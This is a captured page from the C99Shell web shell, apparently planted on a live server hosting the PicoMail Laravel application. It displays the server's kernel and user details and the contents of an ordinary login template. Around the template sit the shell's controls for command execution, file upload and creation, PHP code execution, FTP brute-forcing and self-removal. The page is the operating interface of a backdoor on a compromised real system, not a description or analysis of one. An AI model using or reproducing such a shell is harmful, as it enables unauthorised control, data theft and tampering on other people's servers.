!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/resources/views/auth/   drwxr-xr-x
Free 23.99 GB of 117.98 GB (20.33%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     login.blade.php (3.53 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.auth_customer')

@section('title','Login')

@section('content')

<div class="container-fluid">
    <div class="row">
        <div class="col-md-5 col-lg-6 col-sm-5 left-image-section">
            @if(get_settings('app_logo'))
                <div class="logo-section">
                    <a href="#">
                        <img src="{{asset('uploads/'.get_settings('app_logo'))}}" alt="">
                    </a>
                </div>
            @endif
            <div class="image-section">
                <img src="{{asset('images/login_image.png')}}"  alt="">
            </div>
        </div>
        <div class="col-md-6 col-lg-5 col-sm-6 mt-5 form-section">
            <form action="{{route('authenticate')}}" method="post" id="login_form">
                @csrf
                @if ($registration_status=='enable')
                <div class="form-group">
                    <span class="text-right">@lang('auth.register_account')</span>
                    <a href="{{route('signup')}}" class="btn signin-custom-btn float-right ml-3">@lang('auth.form.button.sign_up')</a>
                </div>
                @endif
                <div class="form-group mt-5">
                    <h2>@lang('auth.welcome',['app_name'=>get_settings('app_name')?get_settings('app_name'):"PicoMail"])</h2>
                    <h6>@lang('auth.login.title')</h6>
                </div>
                <div class="form-group">
                    <label for="">@lang('auth.login.form.email')</label>
                    <input type="email" class="form-control" name="email" placeholder="@lang('auth.login.form.email_placeholder')">
                </div>
                <div class="form-group">
                    <label for="">@lang('auth.login.form.password')</label>
                    <input type="password" class="form-control" name="password" placeholder="@lang('auth.login.form.password_placeholder')">
                </div>
                <div class="form-group">
                    <div class="row">
                        <div class="col-lg-8">
                            <div class="icheck-primary">
                                <input name="remember_me" type="checkbox" id="remember">
                                <label for="remember">
                                    @lang('auth.login.form.remember_me')
                                </label>
                            </div>
                        </div>
                        <div class="col-lg-4">
                            <a href="{{route('password.request')}}">@lang('auth.form.forget_password')</a>
                        </div>
                    </div>

                </div>
                <div class="form-group">
                    @if(get_settings('recaptcha_site_key'))
                        <button class="g-recaptcha btn login-custom-btn"
                                data-sitekey="{{get_settings('recaptcha_site_key')}}"
                                data-callback='onSubmit' id="loginBtn"
                                data-action='submit'>@lang('auth.form.button.sign_in')</button>
                    @else
                    <button type="submit" class="btn login-custom-btn">@lang('auth.form.button.sign_in')</button>
                    @endif
                </div>
            </form>
        </div>
    </div>
</div>

@endsection
@section('extra-script')
    <script src="https://www.google.com/recaptcha/api.js"></script>
    <script src="{{asset('js/auth.js')}}"> </script>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0063 ]--